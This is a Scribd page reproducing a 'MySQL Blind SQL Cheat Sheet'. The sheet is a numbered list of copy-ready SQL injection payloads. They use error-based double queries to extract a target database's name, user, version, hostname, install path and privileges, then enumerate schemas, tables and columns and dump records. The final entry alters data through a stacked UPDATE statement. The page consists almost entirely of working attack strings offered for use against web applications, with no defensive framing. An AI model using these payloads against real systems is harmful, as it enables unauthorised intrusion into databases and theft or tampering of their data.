Scribd Logo
Hochladen

Willkommen bei Scribd!

  • MySQL Blind SQL Cheat Sheets

    Hochgeladen von

    akukurt
    71 Ansichten3 Seiten
    MySQL Blind SQL Cheat Sheets 0x1 Author : nishant 0x2 Compiled by : akukurt Note: The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.   1. To test blind injection Code: ' and 'x

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Verfügbare Formate

    PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    MySQL Blind SQL Cheat Sheets 0x1 Author : nishant 0x2 Compiled by : akukurt Note: The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.   1. To test blind injection Code: ' and 'x

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    71 Ansichten3 Seiten

    MySQL Blind SQL Cheat Sheets

    Hochgeladen von

    akukurt
    MySQL Blind SQL Cheat Sheets 0x1 Author : nishant 0x2 Compiled by : akukurt Note: The data is fetched using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.   1. To test blind injection Code: ' and 'x

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 3

    MySQL Blind SQL Cheat Sheets 0x1 Author : nishant 0x2 Compiled by : akukurt Note: The data is fetched

    using a Hex() and a type casting with the cast() to make the query reliable and avoid bad characters and format strings issue (for example 0x00 as the last byte of every data fetched.) These payloads heavily rely on the information_schema database. So if you don't get the desired result, it just means that the remote database server doesn't have it.
    1. To test blind injection Code:
    ' and 'x'='x

    2. To select the current database (Output will be in Hexadecimal, decode to ASCII Code:
    ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    3. To find the current user Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    4. To find MySQL Version Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    5. Find current database Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    6. To find the system user Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    7. To find the hostname Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    8. To find the installation directory Code:


    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    9. To find the DB User Code:


    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    10. To find the databases Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response. Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    11. To count the number of tables in the selected database Note: Note this count as n Replace colored strings with appropriate value Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    12. To get the table names in the selected database Note: m-n implies execute this query starting from m, m+1n-1 Replace colored strings with appropriate value Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    13. To get number of columns in the selected table name Note: Note this count as n Replace colored strings with appropriate value Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    14. To get column names of a selected table name Note: m-n implies execute this query starting from m, m+1n-1 Replace colored strings with appropriate value Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    15. To count the number of records in a selected column Note: Remember this count as n Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    16. To fetch records from a selected column Note: m-n implies execute this query starting from m, m+1n-1 Replace colored strings with appropriate value Code:
    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    17. Update a record in the selected column Code:


    1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--

    Das könnte Ihnen auch gefallen